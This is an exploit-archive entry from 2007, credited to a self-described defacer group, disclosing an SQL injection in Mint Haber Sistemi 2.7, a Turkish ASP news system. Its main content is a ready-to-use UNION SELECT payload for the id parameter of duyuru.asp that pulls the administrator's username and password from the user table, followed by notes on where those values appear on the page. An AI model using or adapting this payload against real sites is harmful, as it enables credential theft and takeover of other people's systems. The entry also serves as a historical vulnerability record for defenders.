Mint Haber Sistemi 2.7 (duyuru.asp id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mint Haber Sistemi 2.7 (duyuru.asp id) Remote SQL Injection Vulnerability
# Published : 2007-01-12
# Author : chernobiLe
# Previous Title : TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability
# Next Title : Poplar Gedcom Viewer <= 2.0 (common.php) Remote Inclusion Vuln

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# www.Syue.com [2007-01-12]